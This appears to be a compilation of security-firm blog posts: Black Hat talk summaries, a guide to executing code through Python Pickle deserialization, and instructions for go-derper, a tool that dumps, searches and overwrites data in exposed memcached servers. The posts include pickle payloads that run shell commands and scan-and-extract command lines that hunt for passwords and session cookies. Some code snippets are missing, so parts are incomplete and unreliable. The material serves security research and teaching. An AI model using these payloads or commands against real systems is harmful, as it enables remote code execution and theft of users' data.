You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.
Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.
Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.
The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.
Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:
Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.
A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.
Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".
In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.
The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.
This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.
In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.
Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.
This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.
Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...
For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.
See you in Vegas!
Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.
In this post we'll look at executing pure Python code from within a Pickle steram. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the Shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.
eval("import os; os.system('ls'))
fails. It's worth noting that one can still call methods in expressions, so
can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:
or even execute a full code block with a double eval():
Moral of that story: don't ever eval() untrusted input. Obviously.
However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:
cmd = "import os; f=os.popen('sleep 10'); f.read()"
c = compile(cmd,"foo","exec")
>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec"))
>>> print ret
This is because eval() always returns "None" if the supplied code object was compiled with "exec" and means we need a different trick for extracting contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() calls. This works, as globals are passed into eval() and changes reflects after the call returns:
>>> print smashed
Traceback (most recent call last):
File "", line 1, in
NameError: name 'smashed' is not defined
>>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec"))
>>> print smashed
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
This executes 'ls -al', stores it in the "smashed" global variables and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries which is a waste of space and makes output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.
code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")
Converted into Pickle we get:
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
The execution trace of this Pickle stream is:
[SB] [__builtin__.eval] [MARK]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
[SB] [__builtin__.eval] [MARK] [code_object]
[SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
[SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
[SB] [__builtin__.eval] [MARK] [code_object] 
[SB] [__builtin__.eval] [(pop code_object, )]
[SB] [MARK] [__builtin__.globals]
[SB] [MARK] [__builtin__.globals] [()]
[SB] [MARK] [<globals dict>]
[SB] [MARK] [<globals dict>] ['smashed']
[SB] [(<globals dict>,'smashed')]
[SB] [(<globals dict>,'smashed')]
[SB] [__builtin__.getattr] [MARK]
[SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
[SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
[SB] [__builtin__.getattr] (__builtin__.dict,'get')
[SB] [__builtin__.apply] [MARK]
[SB] [__builtin__.apply] [MARK] [dict.get]
[SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
[SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.
In our recent memcached investigations (a blog post is still in the wings) we came across numerous caches storing serialized data. The caches were not homogenous and so the data was quite varied: Java objects, ActiveRecord objects from RoR, JSON, pre-rendered HTML, .Net serialized objects and serialized Python objects. Serialized objects can be useful to an attacker from a number of standpoints: such objects could expose data where naive developers make use of the objects to hold secrets and rely on the user to proxy the objects to various parts of an application. In addition, altering serialized objects could impact on the deserialization process, leading to compromise of the system on which the deserialization takes place.
In all the caches we examined, the most common data format found (apart from HTML snippets) was serialized Python and this prompted a brief investigation into the possible attacks against serialized Python objects. We've put together a couple of posts explaining how one might go about exploiting Pickle strings; the obvious vector is memcached however anytime Pickle strings are passed to an untrusted party the attacks described here become useful.
Python implements a default serialization technique called Pickle. Now I don't pretend to be a Pickle expert; Python is not my script language of choice for starters and serialization is not particularly interesting subject to me, however seeing the following in any docs is cause for further digging:
A little further down the same page, we find a trivial example of how to execute code from a Pickle stream and a quick Google leads to a blog post in which Pickle insecurities are fleshed out in more detail. Both are worthwhile reads.
From these sources emerge the following factoids:
This last point was particularly intriguing; developers purposely removed any semblance of security from the depickling mechanism and exhort users to never deserialize untrusted data. However, the memcached work showed that if one could find memcached instances, it was possible to overwrite data within the cache trivially. If data inside a cache was comprised of Pickle strings, then by overwriting them an attacker is able to inject untrusted Pickle objects into a deserialization operation.
We've had a bit of fun with this seeing how far it can be pushed and over the coming days, I'll post three more entries on this topic. In the mean time, here's some background and a few simple examples to get things going.
In order to understand the Pickle objects below, you'll need to follow a few basic opcodes and their arguments:
Testing out Pickle objects is pretty simple:
An important instruction is the MARK opcode "(", which is used to signify frames on the stack. It is normally used in conjunction with opcodes that have to pop multiple objects off the stack, for example opcodes that build lists, tuples or dicts. The two examples below show how a list and a tuple are produced:
The canonical example given in a number of places including the official Python docs as to why unpickling untrusted data is bad is:
(S'echo hello world'
The intent is clear however the interesting bit is twofold: decoding the instructions used and realizing that for an attacker, "hello world" isn't all that useful. In the next post I'll introduce the basics behind calling functions and see whether we can extend the canonical example into something a little more evil.
[Update: Disclosure and other points discussed in a little more detail here.]
We choose to look at memcached, a "Free & open source, high-performance, distributed memory object caching system" 1. It's not outwardly sexy from a security standpoint and it doesn't have a large and exposed codebase (total LOC is a smidge over 11k). However, what's of interest is the type of applications in which memcached is deployed. Memcached is most often used in web application to speed up page loads. Sites are almost2 always dynamic and either have many clients (i.e. require horizontal scaling) or process piles of data (look to reduce processing time), or oftentimes both. This implies that the sites that use memcached contain more interesting info than simple static sites, and are an indicator of a potentially interesting site. Prominent users of memcached include LiveJournal (memcached was originally written by Brad Fitzpatrick for LJ), Wikipedia, Flickr, YouTube and Twitter.
I won't go into how memcached works, suffice it to say that since data tends to be read more often than written in common use cases the idea is to pre-render and store the finalised content inside the in-memory cache. When future requests ask for the page or data, it doesn't need to be regenerated but can be simply regurgitated from the cache. Their Wiki contains more background.
insurrection:demo marco$ ruby go-derper.rb -f x.x.x.x [i] Scanning x.x.x.x x.x.x.x:11211 ============================== memcached 1.4.5 (1064) up 54:10:01:27, sys time Wed Aug 04 10:34:36 +0200 2010, utime=369388.17, stime=520925.98 Mem: Max 1024.00 MB, max item size = 1024.00 KB Network: curr conn 18, bytes read 44.69 TB, bytes written 695.93 GB Cache: get 514, set 93.41b, bytes stored 825.73 MB, curr item count 1.54m, total items 1.54m, total slabs 3 Stats capabilities: (stat) slabs settings items (set) (get)
44 terabytes read from the cache in 54 days with 1.5 million items stored? This cache is used quite frequently. There's an anomaly here in that the cache reports only 514 reads with 93 billion writes; however it's still worth exploring if only for the size.
We can run the same fingerprint scan against multiple hosts using
ruby go-derper.rb -f host1,host2,host3,...,hostn
or, if the hosts are in a file (one per line):
ruby go-derper.rb -F file_with_target_hosts
Output is either human-readable multiline (the default), or CSV. The latter helps for quickly rearranging and sorting the output to determine potential targets, and is enabled with the "-c" switch:
ruby go-derper.rb -c csv -f host1,host2,host3,...,hostn
Lastly, the monitor mode (-m) will loop forever while retrieving certain statistics and keep track of differences between iterations, in order to determine whether the cache appears to be in active use.
insurrection:demo marco$ ruby go-derper.rb -l -s x.x.x.x
[w] No output directory specified, defaulting to ./output
[w] No prefix supplied, using "run1"
This will extract data from the cache in the form of a key and its value, and save the value in a file under the "./output" directory by default (if this directory doesn't exist then the tool will exit so make sure it's present.) This means a separate file is created for every retrieved value. Output directories and file prefixes are adjustable with "-o" and "-r" respectively, however it's usually safe to leave these alone.
By default, go-derper fetches 10 keys per slab (see the memcached docs for a discussion on slabs; basically similar-sized entries are grouped together.) This default is intentionally low; on an actual assessment this could run into six figures. Use the "-K" switch to adjust:
ruby go-derper.rb -l -K 100 -s x.x.x.x
As mentioned, retrieved data is stored in the "./ouput" directory (or elsewhere if "-o" is used). Within this directory, each new run of the tool produces a set of files prefixed with "runN" in order to keep multiple runs separate. The files produced are:
At this point, there will (hopefully) be a large number of files in your output directory, which may contain useful info. Start grepping.
What we found with a bit of field experience was that mining large caches can take some time, and repeating grep gets quite boring. The tool permits you to supply your own set of regular expressions which will be applied to each retrieved value; matches are printed to the screen and this provides a scroll-by view of bits of data that may pique your interest (things like URLs, email addresses, session IDs, strings starting with "user", "pass" or "auth", cookies, IP addresses etc). The "-R" switch enables this feature and takes a file containing regexes as its sole argument:
ruby go-derper.rb -l -K 100 -R regexs.txt -s x.x.x.x
ruby go-derper.rb -w output/run1-e94aae85bd3469d929727bee5009dddd
This syntax is simple since go-derper will figure out the target server and key from the run's index file.
2 We're hedging here, but we've not come across a static memcached site.
3 If so, you may be as surprised as we were in finding this many open instances.
Wow. At some point our talk hit HackerNews and then SlashDot after swirling around the Twitters for a few days. The attention is quite astounding given the relative lack of technical sexiness to this; explanations for the interest are welcome!
We wanted to highlight a few points that didn't make the slides but were mentioned in the talk:
The potential risk assigned to exposed memcacheds hasn't as yet been publicly demonstrated so it's unsurprising that you'll find memcacheds around. I imagine this issue will flare and be hunted into extinction, at least on the public interwebs.
Lastly, the major interest seems to be on mining data from exposed caches. An equally disturbing issue is overwriting entries in the cache and this shouldn't be underestimated.